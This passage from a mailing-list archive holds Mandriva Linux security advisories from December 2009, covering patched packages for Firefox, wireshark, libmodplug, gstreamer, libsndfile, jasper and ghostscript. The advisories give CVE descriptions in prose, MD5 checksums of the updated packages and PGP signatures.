2008.0/x86_64/firefox-lv-3.0.15-0.1mdv2008.0.x86_64.rpm bc9c8140d1b5a1db4928100c7ec6576c 2008.0/x86_64/firefox-mk-3.0.15-0.1mdv2008.0.x86_64.rpm dd3f05cb445010912f18281d4bbf25dd 2008.0/x86_64/firefox-mn-3.0.15-0.1mdv2008.0.x86_64.rpm e41b1c954066437ecb29e0bc8eafcc5a 2008.0/x86_64/firefox-mr-3.0.15-0.1mdv2008.0.x86_64.rpm 96007b6e31bceed34aa850fa7eca4b0b 2008.0/x86_64/firefox-nb_NO-3.0.15-0.1mdv2008.0.x86_64.rpm 685ea205f1a4fa8a983fd53c2d714a88 2008.0/x86_64/firefox-nl-3.0.15-0.1mdv2008.0.x86_64.rpm 90d4cc328c37b4c463e6fae64a3de428 2008.0/x86_64/firefox-nn_NO-3.0.15-0.1mdv2008.0.x86_64.rpm b321efe125f09f00f0e5c9ac14c054be 2008.0/x86_64/firefox-oc-3.0.15-0.1mdv2008.0.x86_64.rpm 059f5501a4a8bed6b48754e2e07b82e9 2008.0/x86_64/firefox-pa_IN-3.0.15-0.1mdv2008.0.x86_64.rpm 6b8f220f29ef17d4e7c6f25640004772 2008.0/x86_64/firefox-pl-3.0.15-0.1mdv2008.0.x86_64.rpm 1b5d5dc952892b0fdbfa441c4fdfd3da 2008.0/x86_64/firefox-pt_BR-3.0.15-0.1mdv2008.0.x86_64.rpm 3164f85e321ef11637e48235af7d9fa5 2008.0/x86_64/firefox-pt_PT-3.0.15-0.1mdv2008.0.x86_64.rpm ebb8a064121f57cab7de5cfb38eea910 2008.0/x86_64/firefox-ro-3.0.15-0.1mdv2008.0.x86_64.rpm 27583d84905fc24396cc15d5d8bb2999 2008.0/x86_64/firefox-ru-3.0.15-0.1mdv2008.0.x86_64.rpm 9bb03bbb171b1fb322ac63fee5967b8b 2008.0/x86_64/firefox-si-3.0.15-0.1mdv2008.0.x86_64.rpm 56f26f73e197662f8873c1364858a6a5 2008.0/x86_64/firefox-sk-3.0.15-0.1mdv2008.0.x86_64.rpm 33b9f772306ae80070e98ac7fd3bc8ff 2008.0/x86_64/firefox-sl-3.0.15-0.1mdv2008.0.x86_64.rpm 6303dcce929e44536ee20e596f955cd3 2008.0/x86_64/firefox-sq-3.0.15-0.1mdv2008.0.x86_64.rpm e1ff8b70a7d9cb23034f8f18bec0bc12 2008.0/x86_64/firefox-sr-3.0.15-0.1mdv2008.0.x86_64.rpm a63de2a55fdf97097025c7cd46f88004 2008.0/x86_64/firefox-sv_SE-3.0.15-0.1mdv2008.0.x86_64.rpm 67cc6d04dc28b56288bc54353fd73a35 2008.0/x86_64/firefox-te-3.0.15-0.1mdv2008.0.x86_64.rpm c135e46fe5ea4a89a0eacf2421095df1 2008.0/x86_64/firefox-th-3.0.15-0.1mdv2008.0.x86_64.rpm 88b30a5091dd3e61c06c4ae46721840a 2008.0/x86_64/firefox-tr-3.0.15-0.1mdv2008.0.x86_64.rpm 18901803e48f8f8784eb3f74206b311c 2008.0/x86_64/firefox-uk-3.0.15-0.1mdv2008.0.x86_64.rpm aa10aded8511a440c855ffe7fd0876fe 2008.0/x86_64/firefox-zh_CN-3.0.15-0.1mdv2008.0.x86_64.rpm 4123f661b719e0fc0b322404090211e2 2008.0/x86_64/firefox-zh_TW-3.0.15-0.1mdv2008.0.x86_64.rpm 8af9e3bfef0dcce473e7983e0e60c2df 2008.0/x86_64/lib64rarian0-0.8.0-0.1mdv2008.0.x86_64.rpm 083df56e031ee7db74abacdabcb401aa 2008.0/x86_64/lib64rarian-devel-0.8.0-0.1mdv2008.0.x86_64.rpm f8c24af88c6d035477d3a5bc060e256c 2008.0/x86_64/lib64totem-plparser7-2.20.1-1.9mdv2008.0.x86_64.rpm 6e589f62337aae0cdafcaaf23d58e0e8 2008.0/x86_64/lib64totem-plparser-devel-2.20.1-1.9mdv2008.0.x86_64.rpm 78ceb6bb946328cd1023e1e20d7c0799 2008.0/x86_64/lib64xulrunner1.9-1.9.0.15-0.1mdv2008.0.x86_64.rpm bb61af20a5df658f20d2e4d7f9a2467f 2008.0/x86_64/lib64xulrunner-devel-1.9.0.15-0.1mdv2008.0.x86_64.rpm 011ffa6ae08117ccc2f42c2b379aed84 2008.0/x86_64/lib64xulrunner-unstable-devel-1.9.0.15-0.1mdv2008.0.x86_64.rpm 719394196e517f48d5eba1448d1447ec 2008.0/x86_64/mozilla-firefox-ext-blogrovr-1.1.798-0.1mdv2008.0.x86_64.rpm 4d2d61c0dfa2f8a417e31b9c727bcd44 2008.0/x86_64/mozilla-firefox-ext-foxmarks-2.7.2-0.1mdv2008.0.x86_64.rpm 37d949449831e7027dfe28594e831d2b 2008.0/x86_64/mozilla-firefox-ext-scribefire-3.2.3-0.1mdv2008.0.x86_64.rpm bba169ba0b1533f832bd993b2d5cf654 2008.0/x86_64/rarian-0.8.0-0.1mdv2008.0.x86_64.rpm 57296c81b7063e2e25303a50864308a3 2008.0/x86_64/totem-2.20.1-1.9mdv2008.0.x86_64.rpm 1dfc091b90c55f0d55230a15add42d48 2008.0/x86_64/totem-common-2.20.1-1.9mdv2008.0.x86_64.rpm 57cd56e78f3daa8dc5b14fbbe62569f0 2008.0/x86_64/totem-gstreamer-2.20.1-1.9mdv2008.0.x86_64.rpm 89d7479e4ac4eed0a5f6208a85315d71 2008.0/x86_64/totem-mozilla-2.20.1-1.9mdv2008.0.x86_64.rpm 9ca4552cab8d58375229b9b4a9d8ca09 2008.0/x86_64/totem-mozilla-gstreamer-2.20.1-1.9mdv2008.0.x86_64.rpm 7315b15e9f625f9bee0749492ef07d25 2008.0/x86_64/xulrunner-1.9.0.15-0.1mdv2008.0.x86_64.rpm eb876f2a7def5f95aa74fc09021b59d6 2008.0/x86_64/yelp-2.22.1-0.1mdv2008.0.x86_64.rpm d179874cb1679378705722a046b2e79f 2008.0/SRPMS/firefox-3.0.15-0.1mdv2008.0.src.rpm 5d93c52d92e9d91e9f09789499776cbb 2008.0/SRPMS/firefox-l10n-3.0.15-0.1mdv2008.0.src.rpm eb9675d488261eb7c7b48bf517698b08 2008.0/SRPMS/mozilla-firefox-ext-blogrovr-1.1.798-0.1mdv2008.0.src.rpm 86df6dc3efa632aa71d6600e6ac5c1de 2008.0/SRPMS/mozilla-firefox-ext-foxmarks-2.7.2-0.1mdv2008.0.src.rpm c5690af5e35d01db5a626e206e83f6e0 2008.0/SRPMS/mozilla-firefox-ext-scribefire-3.2.3-0.1mdv2008.0.src.rpm d6e2ab7654052e0795b97fa09b28f49c 2008.0/SRPMS/rarian-0.8.0-0.1mdv2008.0.src.rpm b9d7680838c669ec341b689b83979d01 2008.0/SRPMS/totem-2.20.1-1.9mdv2008.0.src.rpm 3a59f30ec62603a99ad52421133d081b 2008.0/SRPMS/xulrunner-1.9.0.15-0.1mdv2008.0.src.rpm 9a2e88de84689ebf04c21e677bea5bb8 2008.0/SRPMS/yelp-2.22.1-0.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGAEDmqjQ0CJFipgRAkqqAJkB8gZJYwBfNDlE3XyBV1VSC7n7FACeJUIv /71G3HucXRWvkY2USlym/kE= =hoXy -----END PGP SIGNATURE----- From security at mandriva.com Thu Dec 3 22:00:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 03 Dec 2009 23:00:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:292-1 ] wireshark Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:292-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : wireshark Date : December 3, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: Vulnerabilities have been discovered and corrected in wireshark, affecting DCERPC/NT dissector, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a file that records a malformed packet trace (CVE-2009-3550); and in wiretap/erf.c which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted erf file (CVE-2009-3829). The wireshark package has been updated to fix these vulnerabilities. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3550 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3829 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 8b075be8db6b26deba7933a925b12f5d 2008.0/i586/dumpcap-1.0.10-0.1mdv2008.0.i586.rpm 3477bcc8d3e2257489b4ae8573f5f8d0 2008.0/i586/libwireshark0-1.0.10-0.1mdv2008.0.i586.rpm 451163f6f02baa7c1eb48fab26e8adfa 2008.0/i586/libwireshark-devel-1.0.10-0.1mdv2008.0.i586.rpm b457625c43f2d605e18e6537b958f0b7 2008.0/i586/rawshark-1.0.10-0.1mdv2008.0.i586.rpm 1ffce24777b986cccd506aee471a14e9 2008.0/i586/tshark-1.0.10-0.1mdv2008.0.i586.rpm 18467254cc21a36f25e0ac47013c90b5 2008.0/i586/wireshark-1.0.10-0.1mdv2008.0.i586.rpm 54bcf934bbf85cf9317abd3f693c1286 2008.0/i586/wireshark-tools-1.0.10-0.1mdv2008.0.i586.rpm 927ccd36d358084a70554eda33b015df 2008.0/SRPMS/wireshark-1.0.10-0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 4320e20a9c0a61623c859ba20c4030a4 2008.0/x86_64/dumpcap-1.0.10-0.1mdv2008.0.x86_64.rpm 4886aa56bd3daf5e906343b92d1c7d57 2008.0/x86_64/lib64wireshark0-1.0.10-0.1mdv2008.0.x86_64.rpm d3d9e1847a4b3ba05a00614e71d76664 2008.0/x86_64/lib64wireshark-devel-1.0.10-0.1mdv2008.0.x86_64.rpm ce78c38b33a2c3c0edde2355845a3218 2008.0/x86_64/rawshark-1.0.10-0.1mdv2008.0.x86_64.rpm 41e36f27fa93dfd8ecacae797403412a 2008.0/x86_64/tshark-1.0.10-0.1mdv2008.0.x86_64.rpm 9b3829112d7250b78294d0f65c71d85b 2008.0/x86_64/wireshark-1.0.10-0.1mdv2008.0.x86_64.rpm 3e6d92fbdae924c7bb131fd867895695 2008.0/x86_64/wireshark-tools-1.0.10-0.1mdv2008.0.x86_64.rpm 927ccd36d358084a70554eda33b015df 2008.0/SRPMS/wireshark-1.0.10-0.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGAmomqjQ0CJFipgRArBzAJ4owwY4ReC8xR2AHGHILeOpGhziHwCdGwn4 luHzusXu4mtItmvczmZxMTs= =OOZm -----END PGP SIGNATURE----- From security at mandriva.com Thu Dec 3 22:11:01 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 03 Dec 2009 23:11:01 +0100 Subject: [Full-disclosure] [ MDVSA-2009:128-1 ] libmodplug Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:128-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : libmodplug Date : December 3, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: Multiple security vulnerabilities has been identified and fixed in libmodplug: Integer overflow in the CSoundFile::ReadMed function (src/load_med.cpp) in libmodplug before 0.8.6, as used in gstreamer-plugins and other products, allows context-dependent attackers to execute arbitrary code via a MED file with a crafted (1) song comment or (2) song name, which triggers a heap-based buffer overflow (CVE-2009-1438). Buffer overflow in the PATinst function in src/load_pat.cpp in libmodplug before 0.8.7 allows user-assisted remote attackers to cause a denial of service and possibly execute arbitrary code via a long instrument name (CVE-2009-1513). The updated packages have been patched to prevent this. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1438 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1513 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 9d7e4ce45987f8103e6e68ff6a789afa 2008.0/i586/libmodplug0-0.8.4-1.1mdv2008.0.i586.rpm 65ca878fccad537bd0dcc8e7b6156d3a 2008.0/i586/libmodplug0-devel-0.8.4-1.1mdv2008.0.i586.rpm 496719add48603cf87e3a27025b5dabb 2008.0/SRPMS/libmodplug-0.8.4-1.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 4e456e05bc59c08a0a0adaf7a2ccce37 2008.0/x86_64/lib64modplug0-0.8.4-1.1mdv2008.0.x86_64.rpm 389e7edbacb029bcd9afef7cf4a9ba0e 2008.0/x86_64/lib64modplug0-devel-0.8.4-1.1mdv2008.0.x86_64.rpm 496719add48603cf87e3a27025b5dabb 2008.0/SRPMS/libmodplug-0.8.4-1.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGAw1mqjQ0CJFipgRArw1AJ41+1ZC03JlLV0BIC9hVLI4w/SjWACgyafO xS9rR8i92aZtwqzfYVcDqsA= =eXl+ -----END PGP SIGNATURE----- From security at mandriva.com Thu Dec 3 22:33:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 03 Dec 2009 23:33:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:130-1 ] gstreamer0.10-plugins-good Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:130-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : gstreamer0.10-plugins-good Date : December 3, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: Multiple integer overflows in the (1) user_info_callback, (2) user_endrow_callback, and (3) gst_pngdec_task functions (ext/libpng/gstpngdec.c) in GStreamer Good Plug-ins (aka gst-plugins-good or gstreamer-plugins-good) 0.10.15 allow remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted PNG file, which triggers a buffer overflow (CVE-2009-1932). Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1932 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: df985dc0abc217067a7d663c411b4209 2008.0/i586/gstreamer0.10-aalib-0.10.6-3.3mdv2008.0.i586.rpm c548713a6efd8d262876bf1ed9363fe5 2008.0/i586/gstreamer0.10-caca-0.10.6-3.3mdv2008.0.i586.rpm 97b895479d7e42ff11735889bb4c16ed 2008.0/i586/gstreamer0.10-dv-0.10.6-3.3mdv2008.0.i586.rpm a63dccd47b65fe27b8f6319662633201 2008.0/i586/gstreamer0.10-esound-0.10.6-3.3mdv2008.0.i586.rpm 0903bef11230d673d2cebe6e6900b2bb 2008.0/i586/gstreamer0.10-flac-0.10.6-3.3mdv2008.0.i586.rpm e80a3bb6ed87aef074c9066e063b85ee 2008.0/i586/gstreamer0.10-plugins-good-0.10.6-3.3mdv2008.0.i586.rpm e3c9a6aac6da3d7b8d9a45b0b561cd86 2008.0/i586/gstreamer0.10-raw1394-0.10.6-3.3mdv2008.0.i586.rpm 08745e3b02ba9fdd66573e9e1f6db381 2008.0/i586/gstreamer0.10-speex-0.10.6-3.3mdv2008.0.i586.rpm 2bedca9a38fd4bca8879b1c947dedffa 2008.0/i586/gstreamer0.10-wavpack-0.10.6-3.3mdv2008.0.i586.rpm bce20d4accbb9500b91d7dfc7283802d 2008.0/SRPMS/gstreamer0.10-plugins-good-0.10.6-3.3mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 295a03de38ee7d2f94f8f7a072d4ef83 2008.0/x86_64/gstreamer0.10-aalib-0.10.6-3.3mdv2008.0.x86_64.rpm 1949357b44313e9342f9e0f064cfe921 2008.0/x86_64/gstreamer0.10-caca-0.10.6-3.3mdv2008.0.x86_64.rpm 5b1402d0fed2ab576ae4226a4aae72a4 2008.0/x86_64/gstreamer0.10-dv-0.10.6-3.3mdv2008.0.x86_64.rpm 22803eab821db27cca1c6362ae2a05d7 2008.0/x86_64/gstreamer0.10-esound-0.10.6-3.3mdv2008.0.x86_64.rpm 915d40526cdfc5bab5d54126f6a90f69 2008.0/x86_64/gstreamer0.10-flac-0.10.6-3.3mdv2008.0.x86_64.rpm 48f0e87f8105251ad7edd7553ae2060f 2008.0/x86_64/gstreamer0.10-plugins-good-0.10.6-3.3mdv2008.0.x86_64.rpm 93e82958bc9833629af16a21372b503d 2008.0/x86_64/gstreamer0.10-raw1394-0.10.6-3.3mdv2008.0.x86_64.rpm 936698fc48970cd422cd0fac330e5e99 2008.0/x86_64/gstreamer0.10-speex-0.10.6-3.3mdv2008.0.x86_64.rpm 1edc68a1a2e4248495df6435a4e38ac6 2008.0/x86_64/gstreamer0.10-wavpack-0.10.6-3.3mdv2008.0.x86_64.rpm bce20d4accbb9500b91d7dfc7283802d 2008.0/SRPMS/gstreamer0.10-plugins-good-0.10.6-3.3mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGBF8mqjQ0CJFipgRAlvjAJ9h9KnXtEP3oqwgaUvRERM7z8xEFQCdGHms QZ0/5EhLrjKzxAm3OVrws2A= =OIZm -----END PGP SIGNATURE----- From security at mandriva.com Thu Dec 3 22:46:01 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 03 Dec 2009 23:46:01 +0100 Subject: [Full-disclosure] [ MDVSA-2009:132-1 ] libsndfile Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:132-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : libsndfile Date : December 3, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: Multiple vulnerabilities has been found and corrected in libsndfile: Heap-based buffer overflow in voc_read_header in libsndfile 1.0.15 through 1.0.19, as used in Winamp 5.552 and possibly other media programs, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a VOC file with an invalid header value (CVE-2009-1788). Heap-based buffer overflow in aiff_read_header in libsndfile 1.0.15 through 1.0.19, as used in Winamp 5.552 and possibly other media programs, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via an AIFF file with an invalid header value (CVE-2009-1791). This update provides fixes for these vulnerabilities. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1788 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1791 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: ea472db88b618bee93d7f3ab1f8ab9b4 2008.0/i586/libsndfile1-1.0.18-0.pre20.0.1mdv2008.0.i586.rpm 3e7fb05e87d69989223f20c5a9aae811 2008.0/i586/libsndfile-devel-1.0.18-0.pre20.0.1mdv2008.0.i586.rpm 9bce8a72068db657b5027c88bc256f37 2008.0/i586/libsndfile-progs-1.0.18-0.pre20.0.1mdv2008.0.i586.rpm 270c48e98c2ce89f2449f0be3d9dbad1 2008.0/i586/libsndfile-static-devel-1.0.18-0.pre20.0.1mdv2008.0.i586.rpm 2e269eb125174d1cbb2441a30f484408 2008.0/SRPMS/libsndfile-1.0.18-0.pre20.0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 9b4bdc3d55214078d297ad89122c567f 2008.0/x86_64/lib64sndfile1-1.0.18-0.pre20.0.1mdv2008.0.x86_64.rpm f251a5402b23fce61b9e90e7db24aa29 2008.0/x86_64/lib64sndfile-devel-1.0.18-0.pre20.0.1mdv2008.0.x86_64.rpm f1a6a61239498b667ed594bddee1e00b 2008.0/x86_64/lib64sndfile-static-devel-1.0.18-0.pre20.0.1mdv2008.0.x86_64.rpm 8525f4f8f5bb8455f86cc23abaa40612 2008.0/x86_64/libsndfile-progs-1.0.18-0.pre20.0.1mdv2008.0.x86_64.rpm 2e269eb125174d1cbb2441a30f484408 2008.0/SRPMS/libsndfile-1.0.18-0.pre20.0.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGBSImqjQ0CJFipgRAjwlAJ9T5WH37B1T40fhxW1V5tj5XjmpiQCgiXdg v+m6uh2k4UrY0KRwoGJ7Wc8= =5Ogf -----END PGP SIGNATURE----- From security at mandriva.com Thu Dec 3 23:17:01 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Dec 2009 00:17:01 +0100 Subject: [Full-disclosure] [ MDVSA-2009:142-1 ] jasper Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:142-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : jasper Date : December 3, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: Multiple security vulnerabilities has been identified and fixed in jasper: The jpc_qcx_getcompparms function in jpc/jpc_cs.c for the JasPer JPEG-2000 library (libjasper) before 1.900 allows remote user-assisted attackers to cause a denial of service (crash) and possibly corrupt the heap via malformed image files, as originally demonstrated using imagemagick convert (CVE-2007-2721). Multiple integer overflows in JasPer 1.900.1 might allow context-dependent attackers to have an unknown impact via a crafted image file, related to integer multiplication for memory allocation (CVE-2008-3520). The jas_stream_tmpfile function in libjasper/base/jas_stream.c in JasPer 1.900.1 allows local users to overwrite arbitrary files via a symlink attack on a tmp.XXXXXXXXXX temporary file (CVE-2008-3521). Buffer overflow in the jas_stream_printf function in libjasper/base/jas_stream.c in JasPer 1.900.1 might allow context-dependent attackers to have an unknown impact via vectors related to the mif_hdr_put function and use of vsprintf (CVE-2008-3522). The updated packages have been patched to prevent this. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2721 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3520 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3521 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3522 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 5f9c8dfae30f0cadf061de621b8c8001 2008.0/i586/jasper-1.900.1-2.1mdv2008.0.i586.rpm 31a18f0fd0eaf9fe8fbc3152716c5a97 2008.0/i586/libjasper1-1.900.1-2.1mdv2008.0.i586.rpm c19c0a59243be390523cfeb26362e177 2008.0/i586/libjasper1-devel-1.900.1-2.1mdv2008.0.i586.rpm 88a5c06798169a312935e33918194286 2008.0/i586/libjasper1-static-devel-1.900.1-2.1mdv2008.0.i586.rpm 16072736699b72d0d545a3b632fa0d70 2008.0/SRPMS/jasper-1.900.1-2.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 387d1e14ef8069d239bff354726b26cb 2008.0/x86_64/jasper-1.900.1-2.1mdv2008.0.x86_64.rpm 2ab7bf2550e00e423b511b5921a103b3 2008.0/x86_64/lib64jasper1-1.900.1-2.1mdv2008.0.x86_64.rpm 5abd166c380e4ed1cc9b925b5d0f1845 2008.0/x86_64/lib64jasper1-devel-1.900.1-2.1mdv2008.0.x86_64.rpm 36e2d6ef0ceb0ffdfa88265a9b016173 2008.0/x86_64/lib64jasper1-static-devel-1.900.1-2.1mdv2008.0.x86_64.rpm 16072736699b72d0d545a3b632fa0d70 2008.0/SRPMS/jasper-1.900.1-2.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGBu5mqjQ0CJFipgRAnnxAKC1Yqp3matYvYtzco9NCLtW6KlsNgCgjIzw PL7nkNJNn62nP+NYytohvZk= =f+gJ -----END PGP SIGNATURE----- From security at mandriva.com Fri Dec 4 00:18:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Dec 2009 01:18:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:311 ] ghostscript Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:311 http://www.mandriva.com/security/ _______________________________________________________________________ Package : ghostscript Date : December 3, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: Multiple security vulnerabilities has been identified and fixed in ghostscript: A buffer underflow in Ghostscript's CCITTFax decoding filter allows remote attackers to cause denial of service and possibly to execute arbitrary by using a crafted PDF file (CVE-2007-6725). Buffer overflow in Ghostscript's BaseFont writer module allows remote attackers to cause a denial of service and possibly to execute arbitrary code via a crafted Postscript file (CVE-2008-6679). Multiple interger overflows in Ghostsript's International Color Consortium Format Library (icclib) allows attackers to cause denial of service (heap-based buffer overflow and application crash) and possibly execute arbirary code by using either a PostScript or PDF file with crafte embedded images (CVE-2009-0583, CVE-2009-0584). Multiple interger overflows in Ghostsript's International Color Consortium Format Library (icclib) allows attackers to cause denial of service (heap-based buffer overflow and application crash) and possibly execute arbirary code by using either a PostScript or PDF file with crafte embedded images. Note: this issue exists because of an incomplete fix for CVE-2009-0583 (CVE-2009-0792). Heap-based overflow in Ghostscript's JBIG2 decoding library allows attackers to cause denial of service and possibly to execute arbitrary code by using a crafted PDF file (CVE-2009-0196). Multiple integer overflows in JasPer 1.900.1 might allow context-dependent attackers to have an unknown impact via a crafted image file, related to integer multiplication for memory allocation (CVE-2008-3520). Buffer overflow in the jas_stream_printf function in libjasper/base/jas_stream.c in JasPer 1.900.1 might allow context-dependent attackers to have an unknown impact via vectors related to the mif_hdr_put function and use of vsprintf (CVE-2008-3522). Previousely the ghostscript packages were statically built against a bundled and private copy of the jasper library. This update makes ghostscript link against the shared system jasper library which makes it easier to address presumptive future security issues in the jasper library. Packages for 2008.0 are being provided due to extended support for Corporate products. This update provides fixes for that vulnerabilities. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6725 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3520 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3522 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6679 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0196 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0583 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0584 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0792 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: d419c4cc3452b90b350c8fda68bf29f8 2008.0/i586/ghostscript-8.60-55.3mdv2008.0.i586.rpm 7e120e4166ebbf8203a05d657223c5d5 2008.0/i586/ghostscript-common-8.60-55.3mdv2008.0.i586.rpm 29685fcf8eb0bb04d59e07fcbb57973f 